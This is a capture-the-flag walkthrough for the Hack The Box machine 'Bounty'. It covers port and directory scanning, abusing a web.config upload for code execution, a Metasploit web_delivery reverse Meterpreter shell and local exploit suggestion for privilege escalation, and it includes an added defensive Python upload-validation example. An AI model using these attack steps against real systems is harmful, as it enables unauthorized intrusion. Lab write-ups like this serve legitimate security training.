Hack The Box: Bounty

Difficulty: Easy
Machine Creator: mrb3n
Tools Used: NMAP, Gobuster, Metasploit

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with a simple NMAP scan to discover open ports and services.

nmap -A


Using Gobuster, we can perform a directory scan. This host is a Windows IIS server, so we add the extensions .aspx and .html to the scan.

gobuster -u -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40 -x .aspx,.html

Remote Code Execution (RCE)


Since we can upload a web.config file, we should be able to upload a web shell in the config file.
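Seen from the defending side, the root cause is an upload form that accepts a file named web.config. The following is an added example, not part of the original write-up or the machine's code: a server-side upload check that normalizes the client-supplied name the way Windows would store it and only accepts allowlisted image types. The function names and the image-only allowlist are assumptions made for illustration.

```python
import re

# Assumption: this upload form only needs images; adjust to the application.
MAGIC_BY_EXT = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Separators, the alternate-data-stream colon, wildcards and control characters.
FORBIDDEN = re.compile(r'[\\/:*?"<>|\x00-\x1f]')


def normalize_name(raw_name):
    """Reduce a client-supplied name to what Windows would actually store."""
    name = re.split(r"[\\/]", raw_name)[-1]   # drop any client-side path
    return name.rstrip(". ").lower()           # Win32 strips trailing dots/spaces


def safe_upload_name(raw_name, content):
    """Return the normalized name if the upload is acceptable, else None."""
    name = normalize_name(raw_name)
    if not name or FORBIDDEN.search(name):
        return None                            # e.g. "web.config::$DATA"
    stem, dot, ext = name.rpartition(".")
    magics = MAGIC_BY_EXT.get("." + ext) if dot and stem else None
    if magics is None:
        return None                            # web.config, .aspx, no extension
    if not content.startswith(magics):
        return None                            # extension and content disagree
    return name


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # constructed sample bytes
    cfg = b"<?xml version='1.0'?><configuration/>"
    for raw, body in [("photo.PNG", png), ("web.config", cfg),
                      ("Web.Config. ", cfg), ("web.config::$DATA", cfg),
                      ("..\\web.config", cfg), ("logo.png", cfg)]:
        print(f"{raw!r:22} -> {safe_upload_name(raw, body)}")
```

Comparing the raw name against a denylist misses variants such as a trailing dot or different casing, which is why the check normalizes first and then applies an allowlist.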


Web Delivery Meterpreter Shell

We need to build our exploit from Metasploit using the web delivery script.

msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set srvhost
msf exploit(multi/script/web_delivery) > set target 2
msf exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost
msf exploit(multi/script/web_delivery) > run

Meterpreter Shell


Privilege Escalation

Now we need a SYSTEM-level session to get root.txt. We can use the local_exploit_suggester recon module in Metasploit.

msf > use post/multi/recon/local_exploit_suggester
msf > set session 2
msf > run

Privilege Escalation Exploit